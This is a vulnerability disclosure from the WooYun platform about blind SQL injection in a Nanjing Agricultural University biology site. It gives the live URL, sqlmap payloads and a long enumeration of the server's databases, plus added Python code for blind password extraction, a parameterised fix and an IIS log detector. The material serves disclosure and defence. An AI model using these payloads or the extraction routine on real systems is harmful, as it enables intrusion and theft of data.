
Vulnerability summary

Defect ID: wooyun-2014-071690

Title: Blind SQL injection in the Nanjing Agricultural University Biology Experimental Teaching Center site

Vendor: Nanjing Agricultural University

Author: 路人甲

Submitted: 2014-08-10 00:59

Fix deadline: 2014-09-24 01:00

Public disclosure: 2014-09-24 01:00

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed to third-party partner organisation (CCERT Education Network Emergency Response Group) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2014-08-10: Details sent to the vendor, awaiting vendor handling
2014-08-12: Vendor confirmed; details disclosed to the vendor only
2014-08-22: Details disclosed to core white hats and relevant domain experts
2014-09-01: Details disclosed to regular white hats
2014-09-11: Details disclosed to intern white hats
2014-09-24: Details disclosed to the public

Brief description:

What is all this? I'm not well read, don't try to fool me.

Detailed description:

http://bio.njau.edu.cn:8003/biocontent.asp?nid=1625&leibie=n91

Proof of vulnerability:

sqlmap identified the following injection points with a total of 44 HTTP(s) requests:
---
Place: GET
Parameter: nid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nid=1625' AND 9507=9507 AND 'fVQf'='fVQf&leibie=n91
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: nid=1625'; WAITFOR DELAY '0:0:5';-- AND 'sxmY'='sxmY&leibie=n91
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: nid=1625' WAITFOR DELAY '0:0:5'-- AND 'hXSb'='hXSb&leibie=n91
---
Database: Botany
[12 tables]
+--------------------------------------------+
| dbo.CourseSearch |
| dbo.Exam |
| dbo.HomeWork |
| dbo.Media |
| dbo.PlantInfo |
| dbo.Question |
| dbo.ReferenceBook |
| dbo.ReferenceWeb |
| dbo.WordDefine |
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------+
Database: NjEduSoft_MB
[63 tables]
+--------------------------------------------+
| dbo."0用户名" |
| dbo."V_动物体重" |
| dbo."V_动物品系" |
| dbo."V_实验对象" |
| dbo."V_实验导联" |
| dbo."V_实验属性" |
| dbo."V_实验步骤" |
| dbo."V_实验药品" |
| dbo."V_药品药效" |
| dbo."动物体重" |
| dbo."动物品系" |
| dbo."动物年龄" |
| dbo."动物类型" |
| dbo."单步名称" |
| dbo."实验分类" |
| dbo."实验属性" |
| dbo."实验录像" |
| dbo."实验步骤" |
| dbo."实验药品" |
| dbo."毒性实验" |
| dbo."毒性实验仪器" |
| dbo."毒性实验状态" |
| dbo."毒性实验给药途径" |
| dbo."毒性实验预处理" |
| dbo."相互作用" |
| dbo."药品药效" |
| dbo."观察参数" |
| dbo."观察导联" |
| dbo.ChapterInfo |
| dbo.DeptInfo |
| dbo.ExpMan_GetExpInfo |
| dbo.ImportErr |
| dbo.JobInfo |
| dbo.LoreInfo |
| dbo.ManagMenu |
| dbo.NewsInfo |
| dbo.NewsUser |
| dbo.PaperInfo |
| dbo.PaperPolicy |
| dbo.PaperTest |
| dbo.PaperTestType |
| dbo.PaperUser |
| dbo.RegistInfo |
| dbo.RubricInfo |
| dbo.SectionInfo |
| dbo.SubjectInfo |
| dbo.SubjectUser |
| dbo.SystemSet |
| dbo.T01 |
| dbo.T02 |
| dbo.T03 |
| dbo.T04 |
| dbo.T05 |
| dbo.T06 |
| dbo.T07 |
| dbo.TestTypeInfo |
| dbo.UserAnswer |
| dbo.UserInfo |
| dbo.UserPower |
| dbo.UserScore |
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------+
Database: attendance
[7 tables]
+--------------------------------------------+
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.users |
| dbo.users_attendance |
| dbo.v_users_attendance |
| dbo.work_time |
+--------------------------------------------+
Database: center
[19 tables]
+--------------------------------------------+
| center.D99_CMD |
| center.D99_Tmp |
| center.foofoofoo |
| center.kill_kk |
| dbo.Category |
| dbo.Discuss |
| dbo.News |
| dbo.Users |
| dbo.config |
| dbo.count |
| dbo.dtproperties |
| dbo.hyinfo |
| dbo.info |
| dbo.moneyinfo |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.xiaolu |
| dbo.yiqi |
| dbo.yyd |
+--------------------------------------------+
Database: nbioweb
[12 tables]
+--------------------------------------------+
| dbo.admininfo |
| dbo.dtproperties |
| dbo.fileinfo |
| dbo.ftype |
| dbo.kclist |
| dbo.lablist |
| dbo.newsinfo |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.teacinfo |
| dbo.visitorinfo |
| dbo.yzfbbs |
+--------------------------------------------+
Database: cellweb
[16 tables]
+--------------------------------------------+
| dbo.D99_CMD |
| dbo.D99_Tmp |
| dbo.admininfo |
| dbo.bbsinfo |
| dbo.chapter |
| dbo.classinfo |
| dbo.dtproperties |
| dbo.fileinfo |
| dbo.homeworkinfo |
| dbo.netall |
| dbo.noun |
| dbo.question |
| dbo.studyinfo |
| dbo.syinfo |
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------+
Database: njjcweb
[9 tables]
+--------------------------------------------+
| dbo.admininfo |
| dbo.dtproperties |
| dbo.fileinfo |
| dbo.ftype |
| dbo.netall |
| dbo.newsinfo |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.yzfbbs |
+--------------------------------------------+
Database: tempdb
[2 tables]
+--------------------------------------------+
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------+
Database: msdb
[77 tables]
+--------------------------------------------+
| dbo.RTblClassDefs |
| dbo.RTblDBMProps |
| dbo.RTblDBXProps |
| dbo.RTblDTMProps |
| dbo.RTblDTSProps |
| dbo.RTblDatabaseVersion |
| dbo.RTblEQMProps |
| dbo.RTblEnumerationDef |
| dbo.RTblEnumerationValueDef |
| dbo.RTblGENProps |
| dbo.RTblIfaceDefs |
| dbo.RTblIfaceHier |
| dbo.RTblIfaceMem |
| dbo.RTblMDSProps |
| dbo.RTblNamedObj |
| dbo.RTblOLPProps |
| dbo.RTblParameterDef |
| dbo.RTblPropDefs |
| dbo.RTblProps |
| dbo.RTblRelColDefs |
| dbo.RTblRelshipDefs |
| dbo.RTblRelshipProps |
| dbo.RTblRelships |
| dbo.RTblSIMProps |
| dbo.RTblScriptDefs |
| dbo.RTblSites |
| dbo.RTblSumInfo |
| dbo.RTblTFMProps |
| dbo.RTblTypeInfo |
| dbo.RTblTypeLibs |
| dbo.RTblUMLProps |
| dbo.RTblUMXProps |
| dbo.RTblVersionAdminInfo |
| dbo.RTblVersions |
| dbo.RTblWorkspaceItems |
| dbo.backupfile |
| dbo.backupmediafamily |
| dbo.backupmediaset |
| dbo.backupset |
| dbo.log_shipping_primaries |
| dbo.log_shipping_secondaries |
| dbo.logmarkhistory |
| dbo.mswebtasks |
| dbo.restorefile |
| dbo.restorefilegroup |
| dbo.restorehistory |
| dbo.sqlagent_info |
| dbo.sysalerts |
| dbo.syscachedcredentials |
| dbo.syscategories |
| dbo.sysconstraints |
| dbo.sysdbmaintplan_databases |
| dbo.sysdbmaintplan_history |
| dbo.sysdbmaintplan_jobs |
| dbo.sysdbmaintplans |
| dbo.sysdownloadlist |
| dbo.sysdtscategories |
| dbo.sysdtspackagelog |
| dbo.sysdtspackages |
| dbo.sysdtssteplog |
| dbo.sysdtstasklog |
| dbo.sysjobhistory |
| dbo.sysjobs |
| dbo.sysjobs_view |
| dbo.sysjobschedules |
| dbo.sysjobservers |
| dbo.sysjobsteps |
| dbo.sysnotifications |
| dbo.sysoperators |
| dbo.syssegments |
| dbo.systargetservergroupmembers |
| dbo.systargetservergroups |
| dbo.systargetservers |
| dbo.systargetservers_view |
| dbo.systaskids |
| dbo.systasks |
| dbo.systasks_view |
+--------------------------------------------+
Database: biologyweb
[42 tables]
+--------------------------------------------+
| dbo.admininfo |
| dbo.departmentinfo |
| dbo.dtproperties |
| dbo.fileinfo |
| dbo.ftype |
| dbo.hcintoinfo |
| dbo.hcnowinfo |
| dbo.hcorderinfo |
| dbo.hcoutinfo |
| dbo.jfinfo |
| dbo.jroominfo |
| dbo.kcsubjectinfo |
| dbo.kechenginfo |
| dbo.kfsubjectinfo |
| dbo.kinfo |
| dbo.kxtype |
| dbo.netall |
| dbo.newsinfo |
| dbo.questioninfo |
| dbo.roominfo |
| dbo.schoolinfo |
| dbo.sjintoinfo |
| dbo.sjnowinfo |
| dbo.sjorderinfo |
| dbo.sjorderinfo1 |
| dbo.sjoutinfo |
| dbo.stuinfo |
| dbo.stumailinfo |
| dbo.subjectinfo |
| dbo.sy |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.teacherinfo |
| dbo.teacmailinfo |
| dbo.visitorinfo |
| dbo.workinfo |
| dbo.workinfo1 |
| dbo.yqinfo |
| dbo.yzfbbs |
| dbo.zxtype |
| dbo.zyinfo |
| dbo.zztype |
+--------------------------------------------+
Database: pubs
[14 tables]
+--------------------------------------------+
| dbo.authors |
| dbo.discounts |
| dbo.employee |
| dbo.jobs |
| dbo.pub_info |
| dbo.publishers |
| dbo.roysched |
| dbo.sales |
| dbo.stores |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.titleauthor |
| dbo.titles |
| dbo.titleview |
+--------------------------------------------+
Database: foodweb
[21 tables]
+--------------------------------------------+
| dbo.D99_CMD |
| dbo.D99_REG |
| dbo.D99_Tmp |
| dbo.aboutinfo |
| dbo.count |
| dbo.dtproperties |
| dbo.fileinfo |
| dbo.ftype |
| dbo.jlgsinfo |
| dbo.kxyjinfo |
| dbo.linkinfo |
| dbo.newsinfo |
| dbo.pangolin_test_table |
| dbo.rencaiinfo |
| dbo.stuinfo |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.t_jiaozhu |
| dbo.teacinfo |
| dbo.xuekeinfo |
| dbo.xyinfo |
+--------------------------------------------+
Database: yzfweb
[10 tables]
+--------------------------------------------+
| dbo.admininfo |
| dbo.dtproperties |
| dbo.fileinfo |
| dbo.ftype |
| dbo.index_swf |
| dbo.netall |
| dbo.newsinfo |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.yzfbbs |
+--------------------------------------------+
Database: master
[38 tables]
+--------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| dbo.JNC |
| dbo.MSreplication_options |
| dbo.dtproperties |
| dbo.spt_datatype_info |
| dbo.spt_datatype_info_ext |
| dbo.spt_fallback_db |
| dbo.spt_fallback_dev |
| dbo.spt_fallback_usg |
| dbo.spt_monitor |
| dbo.spt_provider_types |
| dbo.spt_server_info |
| dbo.spt_values |
| dbo.sysconstraints |
| dbo.syslogins |
| dbo.sysoledbusers |
| dbo.sysopentapes |
| dbo.sysremotelogins |
| dbo.syssegments |
+--------------------------------------------+
Database: muchroom
[15 tables]
+--------------------------------------------+
| dbo.AdminLog |
| dbo.CourseIntro |
| dbo.CourseUpdate |
| dbo.MaMenu |
| dbo.MuchroomCharacter |
| dbo.MuchroomCompany |
| dbo.MuchroomDregs |
| dbo.MuchroomPackage |
| dbo.MuchroomProduction |
| dbo.MuchroomTechnology |
| dbo.MyUser |
| dbo.Pro |
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------+
Database: db_foodweb
[28 tables]
+--------------------------------------------+
| dbo.D99_CMD |
| dbo.D99_REG |
| dbo.D99_Tmp |
| dbo.PicInfo |
| dbo.aboutinfo |
| dbo.adminqx |
| dbo.count |
| dbo.dtproperties |
| dbo.fileinfo |
| dbo.ftype |
| dbo.jlgsinfo |
| dbo.kxyjinfo |
| dbo.linkinfo |
| dbo.newsType |
| dbo.newsinfo |
| dbo.rencaiType |
| dbo.rencaiinfo |
| dbo.stuinfo |
| dbo.syscommand |
| dbo.sysconstraints |
| dbo.sysfile1 |
| dbo.syssegments |
| dbo.systree |
| dbo.t_jiaozhu |
| dbo.teacType |
| dbo.teacinfo |
| dbo.xuekeinfo |
| dbo.xyinfo |
+--------------------------------------------+
Database: model
[2 tables]
+--------------------------------------------+
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------+
Database: vir3d
[7 tables]
+--------------------------------------------+
| dbo.admininfo |
| dbo.dtproperties |
| dbo.fileinfo |
| dbo.ftype |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.virinfo |
+--------------------------------------------+
Database: lfclab
[17 tables]
+--------------------------------------------+
| dbo.comment |
| dbo.dtproperties |
| dbo.hcintoinfo |
| dbo.hcnowinfo |
| dbo.hcoutinfo |
| dbo.hcydinfo |
| dbo.jfidinfo |
| dbo.labinfo |
| dbo.labroom |
| dbo.pfinfo |
| dbo.sjintoinfo |
| dbo.sjnowinfo |
| dbo.sjoutinfo |
| dbo.sjydinfo |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.userinfo |
+--------------------------------------------+
Database: Northwind
[31 tables]
+--------------------------------------------+
| dbo."Alphabetical list of products" |
| dbo."Category Sales for 1997" |
| dbo."Current Product List" |
| dbo."Customer and Suppliers by City" |
| dbo."Order Details Extended" |
| dbo."Order Details" |
| dbo."Order Subtotals" |
| dbo."Orders Qry" |
| dbo."Product Sales for 1997" |
| dbo."Products Above Average Price" |
| dbo."Products by Category" |
| dbo."Quarterly Orders" |
| dbo."Sales Totals by Amount" |
| dbo."Sales by Category" |
| dbo."Summary of Sales by Quarter" |
| dbo."Summary of Sales by Year" |
| dbo.Categories |
| dbo.CustomerCustomerDemo |
| dbo.CustomerDemographics |
| dbo.Customers |
| dbo.EmployeeTerritories |
| dbo.Employees |
| dbo.Invoices |
| dbo.Orders |
| dbo.Products |
| dbo.Region |
| dbo.Shippers |
| dbo.Suppliers |
| dbo.Territories |
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------+
Database: spzx
[12 tables]
+--------------------------------------------+
| dbo.admininfo |
| dbo.bmulu |
| dbo.dtproperties |
| dbo.fileinfo |
| dbo.ftype |
| dbo.mulu |
| dbo.netall |
| dbo.newsinfo |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.yyinfo |
| dbo.yzfbbs |
+--------------------------------------------+
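How the boolean-based blind injection sqlmap reported above actually extracts data, as an added example that is not part of the original report. It models biocontent.asp the way the payloads imply it is written: the nid value is spliced into a single-quoted literal in the SQL text, so `1625'` closes the literal and the trailing `AND 'fVQf'='fVQf` re-balances the quote the page appends. An in-memory sqlite3 database stands in for the real Microsoft SQL Server backend; the table and column names, the admininfo row and the sqlite `unicode()`/`substr()` functions are all assumptions for the demo (on SQL Server the same probe would use `ASCII(SUBSTRING(...))`, and the stacked `'; WAITFOR DELAY` and time-based payloads are SQL Server behaviour that sqlite does not reproduce). The parameterised `safe_lookup` is the code-level fix. Two further points the enumeration above supports: sqlmap could list tables in master, msdb, pubs, Northwind and every other database on the server, so the login the page connects with can at least read the catalogs of the whole instance and should be replaced by a dedicated login with rights only on its own database; and tables named D99_CMD, D99_Tmp and pangolin_test_table are the names the NBSI/Domain and Pangolin injection tools create on a target they are run against, so if that is their origin here, the server had already been hit by automated injection before this report.

```python
import sqlite3

# Constructed stand-in for the site's database (not the real schema): the
# real backend is Microsoft SQL Server; an in-memory sqlite3 database is used
# only so the example runs offline. Table/column names are assumptions.
_conn = sqlite3.connect(":memory:")
_conn.executescript("""
    CREATE TABLE biocontent (nid TEXT, leibie TEXT, title TEXT);
    INSERT INTO biocontent VALUES ('1625', 'n91', 'Plant cell structure');
    CREATE TABLE admininfo (username TEXT, password TEXT);
    INSERT INTO admininfo VALUES ('admin', 'Botany2014');
""")


def vulnerable_lookup(nid: str, leibie: str) -> bool:
    """Models biocontent.asp as sqlmap's payloads imply it is written: the nid
    value is pasted into a quoted SQL literal, so a quote in it ends the literal.
    Returns True when a row came back, i.e. the page renders normally; that
    True/False difference is the only oracle boolean-based blind injection needs."""
    sql = f"SELECT title FROM biocontent WHERE nid='{nid}' AND leibie='{leibie}'"
    return _conn.execute(sql).fetchone() is not None


def safe_lookup(nid: str, leibie: str) -> bool:
    """The fix: bind nid and leibie as parameters so the driver sends them as
    data and the SQL text never changes, whatever the input contains."""
    sql = "SELECT title FROM biocontent WHERE nid=? AND leibie=?"
    return _conn.execute(sql, (nid, leibie)).fetchone() is not None


def blind_extract(lookup, subquery: str, max_len: int = 32) -> str:
    """Boolean-based blind extraction of the scalar returned by `subquery`,
    one character at a time by binary search over ASCII, using probes of the
    shape sqlmap reported for this page:
        1625' AND <condition> AND 'x'='x
    The trailing 'x'='x re-balances the closing quote the page appends.
    sqlite exposes unicode()/substr(); on SQL Server the same probe would be
    ASCII(SUBSTRING(...)) (assumption about the server-side query shape)."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"unicode(substr(({subquery}),{pos},1))>{mid}"
            if lookup(f"1625' AND {cond} AND 'x'='x", "n91"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # past the end of the string: substr() is '' and unicode('') is NULL
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    # The exact boolean probe sqlmap used, and its false twin, against the vulnerable handler
    print(vulnerable_lookup("1625' AND 9507=9507 AND 'fVQf'='fVQf", "n91"))   # True
    print(vulnerable_lookup("1625' AND 9507=9508 AND 'fVQf'='fVQf", "n91"))   # False
    print(blind_extract(vulnerable_lookup, "SELECT password FROM admininfo"))  # Botany2014
    print(repr(blind_extract(safe_lookup, "SELECT password FROM admininfo")))  # ''
```

The extraction loop needs nothing but the page-renders/page-empty difference, which is why a site that never prints a database error is still fully readable through this bug; against `safe_lookup` every probe is treated as a literal nid value, no row matches, and the loop stops on the first character.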

Fix recommendation:

You know the drill!

Copyright: please credit 路人甲@WooYun when reposting
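On the detection side, as an added example that is not from the report: the three payload shapes sqlmap listed in the proof section (a quote-escaped tautology, a stacked `'; WAITFOR DELAY`, and a bare `WAITFOR DELAY`) are easy to pick out of IIS W3C logs, where the query string is logged URL-encoded. The log lines below are constructed to mirror those payloads against biocontent.asp (the field order is the default IIS W3C layout with the `#Fields` header omitted; timestamps, IPs and user agents are invented), and the regexes are this example's own patterns, not a published signature set.

```python
import re
from urllib.parse import parse_qsl

# Constructed IIS W3C log excerpt (not from the report). Fields, in order:
# date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
SAMPLE_LOG = """\
2014-08-09 16:58:01 10.0.0.5 GET /biocontent.asp nid=1625&leibie=n91 8003 - 203.0.113.7 Mozilla/5.0 200
2014-08-09 16:58:02 10.0.0.5 GET /biocontent.asp nid=1625%27+AND+9507%3D9507+AND+%27fVQf%27%3D%27fVQf&leibie=n91 8003 - 203.0.113.7 sqlmap/1.0 200
2014-08-09 16:58:03 10.0.0.5 GET /biocontent.asp nid=1625%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3B--+AND+%27sxmY%27%3D%27sxmY&leibie=n91 8003 - 203.0.113.7 sqlmap/1.0 200
2014-08-09 16:58:09 10.0.0.5 GET /biocontent.asp nid=1625%27+WAITFOR+DELAY+%270%3A0%3A5%27--+AND+%27hXSb%27%3D%27hXSb&leibie=n91 8003 - 203.0.113.7 sqlmap/1.0 200
2014-08-09 16:58:10 10.0.0.5 GET /biocontent.asp nid=1626&leibie=n91 8003 - 198.51.100.9 Mozilla/5.0 200
"""

# One rule per payload shape in the sqlmap output (this example's own patterns).
RULES = [
    # 1625' AND 9507=9507 ...   or   ... AND 'fVQf'='fVQf   (quote-escaped tautology)
    ("boolean-blind tautology", re.compile(r"'\s*(?:AND|OR)\s+'?(\w+)'?\s*=\s*'?\1(?:'|\b)", re.I)),
    # 1625'; WAITFOR ...        (quote closed, a second statement started)
    ("stacked query", re.compile(r"'\s*;\s*\w", re.I)),
    # WAITFOR DELAY '0:0:5'     (SQL Server time-based probe)
    ("time-based delay", re.compile(r"\bWAITFOR\s+DELAY\b", re.I)),
]


def scan_iis_log(text: str) -> list:
    """Return one hit per (request, parameter) whose decoded value matches a rule."""
    hits = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        f = line.split(" ")
        if len(f) < 9:
            continue
        stem, query, client = f[4], f[5], f[8]
        # parse_qsl URL-decodes, so %27 and + become the quote and space sqlmap sent
        for param, value in parse_qsl(query, keep_blank_values=True):
            matched = [name for name, rx in RULES if rx.search(value)]
            if matched:
                hits.append({
                    "time": f"{f[0]} {f[1]}", "client": client, "uri": stem,
                    "param": param, "rules": matched, "value": value,
                })
    return hits


if __name__ == "__main__":
    for h in scan_iis_log(SAMPLE_LOG):
        print(h["time"], h["client"], h["uri"], h["param"], ", ".join(h["rules"]), "|", h["value"])
```

Matching on the decoded parameter value rather than the raw query string matters: sqlmap's `+` and `%27` are only the default encoding, and the same rules keep working when the quote arrives as `%2527` after one extra decoding layer or when spaces are sent as `%20`. The tautology rule is the noisiest of the three and is the one to tune against legitimate traffic; the two `WAITFOR` rules have no benign use in a query string.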


Vulnerability response

Vendor response:

Severity: Medium

Rank: 6

Confirmed: 2014-08-12 09:17

Vendor reply:

The user has been notified and the issue is being handled.

Latest status:

None yet